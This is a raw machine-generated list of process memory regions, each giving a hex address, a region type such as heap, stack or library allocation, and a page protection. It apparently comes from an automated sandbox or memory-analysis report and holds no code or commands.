2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
2DDE000
stack
page read and write
B94000
heap
page read and write
2978000
heap
page read and write
420000
unclassified section
page readonly
B95000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
33C4000
heap
page read and write
977000
heap
page read and write
5B0000
unclassified section
page readonly
11E3000
unkown
page readonly
3260000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
A3FA000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
83E000
stack
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
659000
unkown
page readonly
D9B000
stack
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
7E0C000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
2F81000
heap
page read and write
DD4000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
3070000
trusted library allocation
page read and write
2BBE000
stack
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
4D00000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
21C000
unkown
page readonly
B94000
heap
page read and write
2F8E000
stack
page read and write
303D000
stack
page read and write
961000
heap
page read and write
D4B000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
600000
unclassified section
page readonly
2D00000
heap
page read and write
9F3000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
7E45000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
9B8000
heap
page read and write
2F71000
heap
page read and write
CCF000
heap
page read and write
75C000
stack
page read and write
2F81000
heap
page read and write
99D000
heap
page read and write
2F71000
heap
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
A190000
remote allocation
page read and write
450000
heap
page read and write
2D60000
heap
page read and write
37E0000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
B95000
heap
page read and write
894000
heap
page read and write
326E000
stack
page read and write
7DC4000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
894000
heap
page read and write
D04000
heap
page read and write
250000
unkown
page write copy
2F81000
heap
page read and write
32E0000
heap
page read and write
2F81000
heap
page read and write
610000
unkown
page readonly
2F71000
heap
page read and write
7E0E000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
894000
heap
page read and write
B94000
heap
page read and write
7E2A000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
6AD0000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
92F000
heap
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
66F000
unkown
page write copy
2F71000
heap
page read and write
9ED000
heap
page read and write
D6E000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
5A0000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
99C000
heap
page read and write
DD4000
heap
page read and write
2F71000
heap
page read and write
7E1C000
heap
page read and write
37E0000
trusted library allocation
page read and write
673000
unkown
page readonly
B94000
heap
page read and write
7E08000
heap
page read and write
3070000
trusted library allocation
page read and write
4F0000
unclassified section
page readonly
969000
heap
page read and write
BB0000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
4BAE000
stack
page read and write
D48000
heap
page read and write
91E000
stack
page read and write
A9C000
stack
page read and write
3070000
trusted library allocation
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
B0D000
heap
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
16D0000
trusted library allocation
page read and write
C1F000
stack
page read and write
B94000
heap
page read and write
2710000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
EBC000
heap
page read and write
2F71000
heap
page read and write
C20000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
4A0000
heap
page read and write
3260000
trusted library allocation
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
DC2000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
4AA0000
heap
page read and write
2F81000
heap
page read and write
203000
unkown
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
A80000
heap
page read and write
611000
unkown
page execute read
EB0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
659000
unkown
page readonly
894000
heap
page read and write
B94000
heap
page read and write
B0D5000
direct allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
1760000
heap
page read and write
CF3000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
DD4000
heap
page read and write
99D000
heap
page read and write
658000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
A1F000
stack
page read and write
D1A000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
330C000
stack
page read and write
71CB000
stack
page read and write
B95000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
800000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
3070000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
2DC0000
unclassified section
page readonly
DD4000
heap
page read and write
2F71000
heap
page read and write
A50000
unclassified section
page readonly
2F81000
heap
page read and write
2F71000
heap
page read and write
B95000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
D04000
heap
page read and write
2F81000
heap
page read and write
AAE000
stack
page read and write
3070000
trusted library allocation
page read and write
11CB000
unkown
page write copy
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
48EF000
stack
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
3260000
trusted library allocation
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
C5E000
stack
page read and write
34F0000
heap
page read and write
894000
heap
page read and write
1F5000
unkown
page readonly
2F71000
heap
page read and write
31CE000
stack
page read and write
2D7F000
stack
page read and write
B94000
heap
page read and write
B90000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F3E000
stack
page read and write
2F71000
heap
page read and write
DD4000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
D52000
heap
page read and write
2F81000
heap
page read and write
29CE000
stack
page read and write
3260000
trusted library allocation
page read and write
610000
unkown
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
C00000
heap
page read and write
D04000
heap
page read and write
3090000
heap
page read and write
EB8000
heap
page read and write
2F71000
heap
page read and write
99C000
heap
page read and write
B08000
heap
page read and write
DD6000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
961000
heap
page read and write
2F71000
heap
page read and write
924000
heap
page read and write
F0E000
stack
page read and write
2EBC000
stack
page read and write
7DCB000
heap
page read and write
312E000
stack
page read and write
500000
unclassified section
page readonly
894000
heap
page read and write
894000
heap
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
920000
heap
page read and write
673000
unkown
page readonly
2F81000
heap
page read and write
959F000
stack
page read and write
990000
unclassified section
page readonly
2F81000
heap
page read and write
2F71000
heap
page read and write
2D7F000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
98C000
heap
page read and write
659000
unkown
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
E80000
unkown
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
2C3E000
stack
page read and write
C10000
trusted library allocation
page read and write
894000
heap
page read and write
2DB0000
unclassified section
page readonly
890000
heap
page read and write
2F81000
heap
page read and write
2CD000
unkown
page readonly
37E0000
trusted library allocation
page read and write
10000
unclassified section
page readonly
7DCB000
heap
page read and write
B94000
heap
page read and write
9A0000
heap
page read and write
17C0000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
DC9000
heap
page read and write
2F71000
heap
page read and write
66F000
unkown
page read and write
30F0000
heap
page read and write
F5F000
stack
page read and write
B94000
heap
page read and write
4FA5000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2A70000
heap
page read and write
7E08000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
880000
unclassified section
page readonly
DDD000
heap
page read and write
500000
heap
page read and write
894000
heap
page read and write
B94000
heap
page read and write
4E9F000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
1EC000
stack
page read and write
2F71000
heap
page read and write
396C000
stack
page read and write
21C000
unkown
page readonly
2F81000
heap
page read and write
D2F000
heap
page read and write
3070000
trusted library allocation
page read and write
D0E000
stack
page read and write
895000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
961000
heap
page read and write
894000
heap
page read and write
DDE000
stack
page read and write
B95000
heap
page read and write
895000
heap
page read and write
7EC000
stack
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
CD5000
heap
page read and write
B0A6000
direct allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
DAD000
stack
page read and write
A0E000
heap
page read and write
2F81000
heap
page read and write
961000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
690000
heap
page read and write
4760000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
33D7000
heap
page read and write
61F000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
4FA2000
heap
page read and write
9A8000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B40000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
5D0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
DD8000
heap
page read and write
37E0000
trusted library allocation
page read and write
2970000
heap
page read and write
7DCB000
heap
page read and write
4D0000
unclassified section
page readonly
4E0000
unclassified section
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B09D000
direct allocation
page read and write
7DC5000
heap
page read and write
B94000
heap
page read and write
CAF000
stack
page read and write
B05000
heap
page read and write
2F71000
heap
page read and write
895000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
7D0000
unclassified section
page readonly
56D000
stack
page read and write
C9E000
stack
page read and write
B94000
heap
page read and write
307D000
stack
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
58F000
stack
page read and write
A418000
heap
page read and write
DD4000
heap
page read and write
D2F000
heap
page read and write
7E18000
heap
page read and write
3070000
trusted library allocation
page read and write
31B8000
heap
page read and write
895000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
7E44000
heap
page read and write
894000
heap
page read and write
590000
heap
page read and write
3260000
trusted library allocation
page read and write
1FD000
unkown
page readonly
110000
unclassified section
page readonly
2F71000
heap
page read and write
B95000
heap
page read and write
2F81000
heap
page read and write
B10000
unclassified section
page readonly
2F81000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
7BE0000
direct allocation
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
336F000
stack
page read and write
7F0000
heap
page read and write
250000
unkown
page read and write
DD000
stack
page read and write
3260000
trusted library allocation
page read and write
7C1E000
stack
page read and write
894000
heap
page read and write
B45000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
7DD9000
heap
page read and write
37E0000
trusted library allocation
page read and write
B80000
unclassified section
page readonly
9F2000
heap
page read and write
D20000
unclassified section
page readonly
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
91E000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F70000
trusted library allocation
page read and write
A10000
unclassified section
page readonly
8F0000
heap
page read and write
327C000
stack
page read and write
FCE000
stack
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
8EE000
stack
page read and write
DD4000
heap
page read and write
B11000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
697E000
stack
page read and write
2F81000
heap
page read and write
34F3000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
E81000
unkown
page execute read
7D66000
heap
page read and write
5E0000
unclassified section
page readonly
2F81000
heap
page read and write
7DD8000
heap
page read and write
895000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
3A6D000
stack
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
346E000
stack
page read and write
11A3000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
95DE000
stack
page read and write
A190000
remote allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
9D0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
C50000
heap
page read and write
3070000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
49E000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
A4F1000
heap
page read and write
2F81000
heap
page read and write
34F7000
heap
page read and write
22C000
unkown
page readonly
4B3F000
stack
page read and write
2F71000
heap
page read and write
9EE000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
53D000
stack
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
B40000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
659000
unkown
page readonly
7DE1000
heap
page read and write
9DD000
heap
page read and write
3070000
trusted library allocation
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
4C2E000
stack
page read and write
120000
unclassified section
page readonly
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
D3E000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
620000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
37E0000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
328E000
stack
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
68FF000
stack
page read and write
5AD000
stack
page read and write
DC0000
trusted library allocation
page read and write
B94000
heap
page read and write
7D67000
heap
page read and write
98B000
heap
page read and write
C40000
heap
page read and write
894000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
550000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
7DDD000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
8C0000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
67E000
stack
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
3070000
trusted library allocation
page read and write
9FB000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
7DFB000
heap
page read and write
C70000
heap
page read and write
894000
heap
page read and write
294D000
stack
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
B1BA000
direct allocation
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
7E1D000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
895000
heap
page read and write
3070000
trusted library allocation
page read and write
659000
unkown
page readonly
2F81000
heap
page read and write
AE40000
heap
page read and write
1D0000
unclassified section
page readonly
2F81000
heap
page read and write
961000
heap
page read and write
2F81000
heap
page read and write
1200000
unkown
page readonly
895000
heap
page read and write
3260000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
9D3000
heap
page read and write
120B000
unkown
page readonly
3260000
trusted library allocation
page read and write
29B0000
heap
page read and write
A08000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
9A8000
heap
page read and write
D4F000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
9C0000
heap
page read and write
4D09000
heap
page read and write
37E0000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
70E000
stack
page read and write
895000
heap
page read and write
134E000
stack
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
DD7000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
37E0000
trusted library allocation
page read and write
7DB5000
heap
page read and write
7E1C000
heap
page read and write
B94000
heap
page read and write
A00000
heap
page read and write
B05000
heap
page read and write
3550000
heap
page read and write
114E000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
7D74000
heap
page read and write
DD0000
heap
page read and write
2F81000
heap
page read and write
8E8000
heap
page read and write
2F71000
heap
page read and write
10FB000
stack
page read and write
37E0000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
2F80000
heap
page read and write
CAF000
stack
page read and write
2F81000
heap
page read and write
977000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
7BE0000
direct allocation
page read and write
30B0000
unclassified section
page readonly
2E30000
heap
page read and write
3260000
trusted library allocation
page read and write
7D61000
heap
page read and write
969000
heap
page read and write
2F1E000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
4F0000
heap
page read and write
54E000
stack
page read and write
7DCB000
heap
page read and write
A4F2000
heap
page read and write
2770000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
6D0000
unclassified section
page readonly
720000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
9A6000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
9A9000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
324F000
stack
page read and write
7D1E000
stack
page read and write
CC0000
heap
page read and write
2F71000
heap
page read and write
3260000
trusted library allocation
page read and write
8DD000
stack
page read and write
3920000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
3070000
trusted library allocation
page read and write
2F81000
heap
page read and write
99B0000
direct allocation
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B4C000
stack
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
7DE1000
heap
page read and write
B94000
heap
page read and write
7E1B000
heap
page read and write
2F71000
heap
page read and write
810000
heap
page read and write
D04000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
7E18000
heap
page read and write
2F81000
heap
page read and write
2DBE000
stack
page read and write
611000
unkown
page execute read
37E0000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
B94000
heap
page read and write
894000
heap
page read and write
4D05000
heap
page read and write
7DD8000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
52C000
stack
page read and write
7DCB000
heap
page read and write
2F81000
heap
page read and write
C70000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
895000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
7E18000
heap
page read and write
4D09000
heap
page read and write
B94000
heap
page read and write
9A7000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
894000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
6F0000
heap
page read and write
2F71000
heap
page read and write
DD4000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
5F0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B8C000
stack
page read and write
2F81000
heap
page read and write
BFE000
stack
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
673000
unkown
page readonly
6E0000
unclassified section
page readonly
C0F000
stack
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
7D64000
heap
page read and write
995E000
stack
page read and write
3260000
trusted library allocation
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
2F71000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
22C000
unkown
page readonly
C28000
heap
page read and write
54C000
stack
page read and write
2F71000
heap
page read and write
45C000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
7DC4000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
810000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
7DD8000
heap
page read and write
BC0000
unclassified section
page readonly
894000
heap
page read and write
2F81000
heap
page read and write
E1E000
stack
page read and write
2F71000
heap
page read and write
8E0000
heap
page read and write
3070000
trusted library allocation
page read and write
11CB000
unkown
page read and write
2F81000
heap
page read and write
DED000
heap
page read and write
3260000
trusted library allocation
page read and write
9A0000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
66F000
unkown
page write copy
932000
heap
page read and write
B94000
heap
page read and write
17C6000
heap
page read and write
5E0000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2EE0000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
4C6F000
stack
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
A2EE000
stack
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
DD4000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
DD9000
heap
page read and write
7DC4000
heap
page read and write
894000
heap
page read and write
7E3E000
heap
page read and write
894000
heap
page read and write
C55000
heap
page read and write
B95000
heap
page read and write
B94000
heap
page read and write
37E0000
trusted library allocation
page read and write
2F81000
heap
page read and write
D20000
heap
page read and write
2F81000
heap
page read and write
A3F1000
heap
page read and write
7DC4000
heap
page read and write
B94000
heap
page read and write
894000
heap
page read and write
66F000
unkown
page write copy
7E18000
heap
page read and write
2F71000
heap
page read and write
7E1C000
heap
page read and write
2F81000
heap
page read and write
B0E000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
85E000
stack
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
DD4000
heap
page read and write
80F000
stack
page read and write
2F81000
heap
page read and write
1117000
unkown
page readonly
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2990000
heap
page read and write
C6E000
stack
page read and write
B94000
heap
page read and write
895000
heap
page read and write
25B000
unkown
page read and write
2F81000
heap
page read and write
37E0000
trusted library allocation
page read and write
7E28000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
736000
heap
page read and write
A40C000
heap
page read and write
37E0000
trusted library allocation
page read and write
B94000
heap
page read and write
9DE000
stack
page read and write
4E1F000
stack
page read and write
340000
unclassified section
page readonly
AC8000
heap
page read and write
B94000
heap
page read and write
910000
heap
page read and write
2F71000
heap
page read and write
7DCB000
heap
page read and write
894000
heap
page read and write
894000
heap
page read and write
66F000
unkown
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
7E45000
heap
page read and write
7DDD000
heap
page read and write
2F71000
heap
page read and write
611000
unkown
page execute read
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
971E000
stack
page read and write
2F71000
heap
page read and write
98B000
heap
page read and write
D1E000
stack
page read and write
83C000
stack
page read and write
1770000
trusted library allocation
page read and write
2F81000
heap
page read and write
38D000
unkown
page readonly
894000
heap
page read and write
B94000
heap
page read and write
659000
unkown
page readonly
2F71000
heap
page read and write
2F81000
heap
page read and write
DD4000
heap
page read and write
673000
unkown
page readonly
659000
unkown
page readonly
D00000
heap
page read and write
4D0000
unclassified section
page readonly
B94000
heap
page read and write
2F81000
heap
page read and write
C5E000
stack
page read and write
5F0000
unclassified section
page readonly
2D9D000
stack
page read and write
DDA000
heap
page read and write
2F71000
heap
page read and write
3070000
trusted library allocation
page read and write
730000
heap
page read and write
3070000
trusted library allocation
page read and write
3260000
trusted library allocation
page read and write
2F71000
heap
page read and write
43C000
stack
page read and write
894000
heap
page read and write
78C000
stack
page read and write
2F81000
heap
page read and write
AB0000
heap
page read and write
B94000
heap
page read and write
B94000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
DC7000
heap
page read and write
2F71000
heap
page read and write
2F71000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
ADD000
stack
page read and write
2F81000
heap
page read and write
611000
unkown
page execute read
7CE000
stack
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
B95000
heap
page read and write
A1000
unkown
page execute read
AC0000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
A41A000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
3260000
trusted library allocation
page read and write
B0C000
heap
page read and write
D10000
heap
page read and write
DC7000
heap
page read and write
10CE000
stack
page read and write
AE9000
heap
page read and write
2F81000
heap
page read and write
5C0000
unclassified section
page readonly
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
342E000
stack
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
2F81000
heap
page read and write
894000
heap
page read and write
2F81000
heap
page read and write
3070000
trusted library allocation
page read and write
2F71000
heap
page read and write
945F000
stack
page read and write
11D8000
unkown
page write copy
B00000
heap
page read and write
3260000
trusted library allocation
page read and write
9EF000
heap
page read and write
A04000
heap
page read and write
2F81000
heap
page read and write
A35000
heap
page read and write
4B0000
heap
page read and write
B94000
heap
page read and write
2F81000
heap
page read and write
7E03000
heap
page read and write
33CA000
heap
page read and write
DD4000
heap
page read and write
2F81000
heap
page read and write
3260000
trusted library allocation
page read and write
3070000
